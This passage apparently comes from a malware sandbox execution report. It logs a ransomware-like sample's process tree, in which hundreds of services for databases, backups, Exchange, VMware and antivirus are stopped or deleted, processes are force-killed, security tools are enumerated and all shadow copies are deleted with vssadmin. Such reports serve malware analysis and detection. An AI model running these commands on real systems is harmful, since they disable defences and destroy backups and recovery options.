PID:3248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPWriterV4
4⤵
PID:4052

C:\Windows\SysWOW64\net.exe
net stop SPSearch4
3⤵
PID:1756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SPSearch4
4⤵
PID:2876

C:\Windows\SysWOW64\net.exe
net stop MSSQLServerADHelper100
3⤵
PID:4772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100
4⤵
PID:852

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
3⤵
PID:2768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
4⤵
PID:4248

C:\Windows\SysWOW64\net.exe
net stop firebirdguardiandefaultinstance
3⤵
PID:1860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop firebirdguardiandefaultinstance
4⤵
PID:1908

C:\Windows\SysWOW64\net.exe
net stop ibmiasrw
3⤵
PID:3004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ibmiasrw
4⤵
PID:844

C:\Windows\SysWOW64\net.exe
net stop QBCFMonitorService
3⤵
PID:4784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService
4⤵
PID:3604

C:\Windows\SysWOW64\net.exe
net stop QBVSS
3⤵
PID:4312

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBVSS
4⤵
PID:4444

C:\Windows\SysWOW64\net.exe
net stop QBPOSDBServiceV12
3⤵
PID:4836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBPOSDBServiceV12
4⤵
PID:4296

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Server (CProgramFilesIBMDominodata)"
3⤵
PID:5100

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Server (CProgramFilesIBMDominodata)"
4⤵
PID:4912

C:\Windows\SysWOW64\net.exe
net stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
3⤵
PID:4152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "IBM Domino Diagnostics (CProgramFilesIBMDomino)"
4⤵
PID:1752

C:\Windows\SysWOW64\net.exe
net stop IISADMIN
3⤵
PID:4892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISADMIN
4⤵
PID:3088

C:\Windows\SysWOW64\net.exe
net stop "Simply Accounting Database Connection Manager"
3⤵
PID:2820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "Simply Accounting Database Connection Manager"
4⤵
PID:2408

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB1
3⤵
PID:4788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB1
4⤵
PID:1228

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB2
3⤵
PID:2312

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB2
4⤵
PID:3668

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB3
3⤵
PID:1732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB3
4⤵
PID:1204

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB4
3⤵
PID:3648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB4
4⤵
PID:3920

C:\Windows\SysWOW64\net.exe
net stop QuickBooksDB5
3⤵
PID:844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QuickBooksDB5
4⤵
PID:4812

C:\Windows\SysWOW64\taskkill.exe
taskkill -f -im UniFi.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4820

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq MsMpEng.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3408

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:776

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq ntrtscan.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2220

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:5108

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq avp.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3272

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:2040

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq WRSA.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5088

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:4172

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq egui.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1756

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:4692

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "imagename eq AvastUI.exe"
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2984

C:\Windows\SysWOW64\find.exe
find /c "PID"
3⤵
PID:2940

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
3⤵
- Interacts with shadow copies
PID:4644

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
3⤵
PID:1416

C:\Windows\SysWOW64\sc.exe
sc delete "XT800Service_Personal"
4⤵
- Launches sc.exe
PID:2024

C:\Windows\SysWOW64\sc.exe
sc delete SQLSERVERAGENT
4⤵
PID:3000

C:\Windows\SysWOW64\sc.exe
sc delete SQLWriter
4⤵
PID:4684

C:\Windows\SysWOW64\sc.exe
sc delete SQLBrowser
4⤵
PID:3228

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLFDLauncher
4⤵
- Launches sc.exe
PID:1168

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLSERVER
4⤵
PID:328

C:\Windows\SysWOW64\sc.exe
sc delete QcSoftService
4⤵
- Launches sc.exe
PID:4788

C:\Windows\SysWOW64\sc.exe
sc delete MSSQLServerOLAPService
4⤵
- Launches sc.exe
PID:444

C:\Windows\SysWOW64\sc.exe
sc delete VMTools
4⤵
PID:3248

C:\Windows\SysWOW64\sc.exe
sc delete VGAuthService
4⤵
PID:420

C:\Windows\SysWOW64\sc.exe
sc delete MSDTC
4⤵
- Launches sc.exe
PID:5012

C:\Windows\SysWOW64\sc.exe
sc delete TeamViewer
4⤵
- Launches sc.exe
PID:5092

C:\Windows\SysWOW64\sc.exe
sc delete ReportServer
4⤵
- Launches sc.exe
PID:5112

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
3⤵
PID:2592

C:\Windows\SysWOW64\sc.exe
sc delete "DAService_TCP"
4⤵
PID:712

C:\Windows\SysWOW64\sc.exe
sc delete "eCard-TTransServer"
4⤵
PID:532

C:\Windows\SysWOW64\sc.exe
sc delete eCardMPService
4⤵
- Launches sc.exe
PID:4376

C:\Windows\SysWOW64\sc.exe
sc delete EnergyDataService
4⤵
PID:1388

C:\Windows\SysWOW64\sc.exe
sc delete UI0Detect
4⤵
- Launches sc.exe
PID:420

C:\Windows\SysWOW64\sc.exe
sc delete K3MobileService
4⤵
PID:4872

C:\Windows\SysWOW64\sc.exe
sc delete TCPIDDAService
4⤵
- Launches sc.exe
PID:1600

C:\Windows\SysWOW64\sc.exe
sc delete WebAttendServer
4⤵
- Launches sc.exe
PID:5056

C:\Windows\SysWOW64\sc.exe
sc delete UIODetect
4⤵
PID:1948

C:\Windows\SysWOW64\sc.exe
sc delete "wanxiao-monitor"
4⤵
PID:3772

C:\Windows\SysWOW64\sc.exe
sc delete VMAuthdService
4⤵
PID:2100

C:\Windows\SysWOW64\sc.exe
sc delete VMUSBArbService
4⤵
PID:1872

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services""
3⤵
PID:4668

C:\Windows\SysWOW64\sc.exe
sc delete OracleOraDb11g_home1ClrAgent
4⤵
PID:4444

C:\Windows\SysWOW64\sc.exe
sc delete OracleOraDb11g_home1TNSListener
4⤵
PID:5012

C:\Windows\SysWOW64\sc.exe
sc delete OracleVssWriterORCL
4⤵
- Launches sc.exe
PID:1268

C:\Windows\SysWOW64\sc.exe
sc delete OracleServiceORCL
4⤵
PID:3096

C:\Windows\SysWOW64\sc.exe
sc delete aspnet_state @sc delete Redis
4⤵
PID:1528

C:\Windows\SysWOW64\sc.exe
sc delete OracleVssWriterORCL
4⤵
PID:448

C:\Windows\SysWOW64\sc.exe
sc delete JhTask
4⤵
PID:2116

C:\Windows\SysWOW64\sc.exe
sc delete ImeDictUpdateService
4⤵
PID:4620

C:\Windows\SysWOW64\sc.exe
sc delete XT800Service_Personal
4⤵
PID:3096

C:\Windows\SysWOW64\sc.exe
sc delete MCService
4⤵
PID:4084

C:\Windows\SysWOW64\sc.exe
sc delete ImeDictUpdateService
4⤵
- Launches sc.exe
PID:1264

C:\Windows\SysWOW64\sc.exe
sc delete allpass_redisservice_port21160
4⤵
PID:1884

C:\Windows\SysWOW64\cmd.exe
cmd /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusbrdsrv & @sc delete "ZTE USBIP Client Guard" & @sc delete "ZTE USBIP Client" & @sc delete "ZTE FileTranS" & @sc delete wwbizsrv & @sc delete qemu-ga & @sc delete AlibabaProtect & @sc delete ZTEVdservice & @sc delete kbasesrv & @sc delete MMRHookService & @sc delete OracleJobSchedulerORCL & @sc delete IpOverUsbSvc & @sc delete MsDtsServer100 & @sc delete KuaiYunTools & @sc delete KMSELDI & @sc delete btPanel & @sc delete Protect_2345Explorer & @sc delete 2345PicSvc & @sc delete vmware-converter-agent & @sc delete vmware-converter-server & @sc delete vmware-converter-worker & @sc delete QQCertificateService & @sc delete OracleRemExecService & @sc delete GPSDaemon & @sc delete GPSUserSvr & @sc delete GPSDownSvr & @sc delete GPSStorageSvr & @sc delete GPSDataProcSvr & @sc delete GPSGatewaySvr & @sc delete GPSMediaSvr & @sc delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
3⤵
PID:2948

C:\Windows\SysWOW64\sc.exe
sc delete "UWS LoPriv Services"
4⤵
PID:3432

C:\Windows\SysWOW64\sc.exe
sc delete ftnlsv3
4⤵
- Launches sc.exe
PID:4704

C:\Windows\SysWOW64\sc.exe
sc delete ftnlses3
4⤵
PID:3740

C:\Windows\SysWOW64\sc.exe
sc delete FxService
4⤵
- Launches sc.exe
PID:2732

C:\Windows\SysWOW64\sc.exe
sc delete "UtilDev Web Server Pro"
4⤵
PID:3472

C:\Windows\SysWOW64\sc.exe
sc delete ftusbrdwks
4⤵
PID:4652

C:\Windows\SysWOW64\sc.exe
sc delete ftusbrdsrv
4⤵
PID:3160

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE USBIP Client Guard"
4⤵
- Launches sc.exe
PID:4448

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE USBIP Client"
4⤵
- Launches sc.exe
PID:3636

C:\Windows\SysWOW64\sc.exe
sc delete "ZTE FileTranS"
4⤵
- Launches sc.exe
PID:4552

C:\Windows\SysWOW64\sc.exe
sc delete wwbizsrv
4⤵
PID:4948

C:\Windows\SysWOW64\cmd.exe
cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
3⤵
PID:844

C:\Windows\SysWOW64\sc.exe
sc delete MSCRMAsyncService
4⤵
- Launches sc.exe
PID:272

C:\Windows\SysWOW64\sc.exe
sc delete REPLICA
4⤵
- Launches sc.exe
PID:2888

C:\Windows\SysWOW64\sc.exe
sc delete RTCATS
4⤵
PID:4720

C:\Windows\SysWOW64\sc.exe
sc delete RTCAVMCU
4⤵
- Launches sc.exe
PID:2264

C:\Windows\SysWOW64\sc.exe
sc delete RtcQms
4⤵
- Launches sc.exe
PID:3408

C:\Windows\SysWOW64\sc.exe
sc delete RTCMEETINGMCU
4⤵
- Launches sc.exe
PID:732

C:\Windows\SysWOW64\sc.exe
sc delete RTCIMMCU
4⤵
PID:1168

C:\Windows\SysWOW64\sc.exe
sc delete RTCDATAMCU
4⤵
PID:3252

C:\Windows\SysWOW64\sc.exe
sc delete RTCCDR
4⤵
PID:3168

C:\Windows\SysWOW64\sc.exe
sc delete ProjectEventService16
4⤵
PID:2920

C:\Windows\SysWOW64\sc.exe
sc delete ProjectQueueService16
4⤵
- Launches sc.exe
PID:4860

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
3⤵
PID:288

C:\Windows\SysWOW64\net.exe
net stop U8WorkerService1
4⤵
PID:4756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop U8WorkerService1
5⤵
PID:2408

C:\Windows\SysWOW64\net.exe
net stop U8WorkerService2
4⤵
PID:4608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop U8WorkerService2
5⤵
PID:1120

C:\Windows\SysWOW64\net.exe
net stop "memcached Server"
4⤵
PID:4724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "memcached Server"
5⤵
PID:2504

C:\Windows\SysWOW64\net.exe
net stop Apache2.4
4⤵
PID:732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Apache2.4
5⤵
PID:3568

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
3⤵
PID:3624

C:\Windows\SysWOW64\net.exe
net stop HaoZipSvc
4⤵
PID:3116

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop HaoZipSvc
5⤵
PID:3496

C:\Windows\SysWOW64\net.exe
net stop "igfxCUIService2.0.0.0"
4⤵
PID:4948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
5⤵
PID:2108

C:\Windows\SysWOW64\net.exe
net stop Realtek11nSU
4⤵
PID:1032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Realtek11nSU
5⤵
PID:4572

C:\Windows\SysWOW64\net.exe
net stop xenlite
4⤵
PID:4448

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop xenlite
5⤵
PID:3636

C:\Windows\SysWOW64\cmd.exe
cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
3⤵
PID:1832

C:\Windows\SysWOW64\net.exe
net stop UIODetect
4⤵
PID:1104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UIODetect
5⤵
PID:4304

C:\Windows\SysWOW64\net.exe
net stop VMwareHostd
4⤵
PID:4040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VMwareHostd
5⤵
PID:3116

C:\Windows\SysWOW64\net.exe
net stop TeamViewer8
4⤵
- Discovers systems in the same network
PID:4500

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TeamViewer8
5⤵
PID:4772

C:\Windows\SysWOW64\net.exe
net stop VMUSBArbService
4⤵
PID:4652

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
3⤵
PID:2312

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM sqlservr.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4852

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM httpd.exe /F
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3668

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM java.exe /F
4⤵
- Kills process with taskkill
PID:160

C:\Windows\SysWOW64\cmd.exe
cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & 